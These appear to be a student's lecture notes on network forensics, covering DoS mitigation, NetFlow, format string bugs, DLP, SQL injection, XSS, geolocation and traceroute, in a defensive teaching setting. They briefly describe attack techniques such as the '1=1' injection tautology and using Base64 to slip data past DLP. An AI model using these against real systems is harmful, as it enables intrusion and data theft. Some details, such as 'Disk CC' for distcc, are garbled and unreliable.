11/8 forensic notes

Overview of Denial of Service (DoS) Attacks

  • Distributed Denial of Service (DDoS) attacks often originate from a source within the Internet services that can be identified and mitigated.

  • Contacting Internet Service Providers (ISP) for cooperation to identify and stop attacks at their source.

Network Telescope System

  • A protective measure against denial of service attacks.

  • Detects anomalies such as fake scattered traffic.

    • Attackers spoof IP addresses, which can lead to responses from machines configured not to accept them, resulting in backscatter packets.

  • Monitoring traffic for unusual backscatter indicates potential malicious attacks or abnormal traffic.

Strategies for Denial of Service Attack Prevention

1. Reverse Address Verification

  • Before forwarding packets, verify if the source IP address is reachable.

    • This can filter out illegitimate traffic but may slow down the system.

2. NetFlow System

  • Developed by Cisco, deployed at network boundaries to collect traffic metadata.

  • Identifies traffic patterns and flow statistics to detect and mitigate attacks based on specific addresses.

Vulnerabilities and Exploits

1. Disk CC Utility

  • A utility for distributed systems that sends compilation tasks to idle machines.

    • Attackers can exploit this by sending malicious code for execution, potentially causing buffer overflow vulnerabilities.

2. Format String Vulnerabilities

  • Exploitation of improper handling of user input in programming languages.

    • If user inputs improper format strings, they can inject malicious code during execution due to failure in argument verification.

3. Insider Threats

  • Attackers may also originate from within an organization, but they face limitations in launching DoS due to available monitoring systems.

  • Insider threats often focus on data theft rather than destructive attacks.

Data Loss Prevention (DLP)

  • Tools and strategies to protect sensitive information.

    • Can identify keyword patterns when sensitive files are emailed, allowing for potential interception of malicious data.

  • Attackers may hide data through fragmentation or unusual encoding schemes (e.g. Base64 encoding) to avoid detection.

Encoding Example: Base64

  • Converts text into a unique format that can elude DLP systems: 8-bit ASCII to 6-bit groups resulting in a different representation for data transfer.

Types of Attacks

4. Script Injection Attacks

  • Involves injecting malicious scripts into web applications.

    • Depending on input validation, these scripts may be executed by the server or the user’s browser.

SQL Injection

  • Attackers manipulate SQL queries by inputting specially crafted strings to bypass authentication checks and gain unauthorized access.

  • Example: Using 1=1 as part of input can leverage the verification system to allow access inadvertently.

Cross-Site Scripting (XSS)

  • Involves injecting malicious JavaScript into web pages for execution within a user’s browser.

    • Reflected XSS: Immediate execution through a crafted URL. The script executes only when a user clicks the harmful link.

    • Stored XSS: Malicious script is stored on the server and executed for every user visiting the targeted page.

Prevention Strategies

For SQL Injection

  • Disable specific symbols to avoid changing the meaning of query statements.

  • Use parameterized queries to mitigate the risk of inputs altering SQL command forms.

For XSS Attacks

  • Input validation must be strict, disallowing JavaScript and other scripting characters in user submissions.

  • Maintain regular checks and sanitization of stored data to eliminate potential threats from databases.

Geolocation Awareness in Network Forensics

1. Geolocation Techniques

  • GPS: Accurate but may not work indoors.

  • Dead Reckoning: Determines location based on last known position and movement directions (useful for indoor navigation).

  • IP Addresses and Time Zones: Can provide approximate location data based on known patterns but may lack precision.

2. Data Consistency in Forensics

  • Must convert timestamps and time zones from various sources to a uniform standard for analysis.

  • Understanding time and location correlations enhances forensic investigations and clarifies data origins.

Network Path Analysis with Trace Route

  • Used for identifying routing paths and network devices between a source and destination.

    • Traces each hop based on TTL decrement until reaching the target or max hops.

  • Outputs include round-trip times to measure the latency in connections, useful for diagnosing network issues.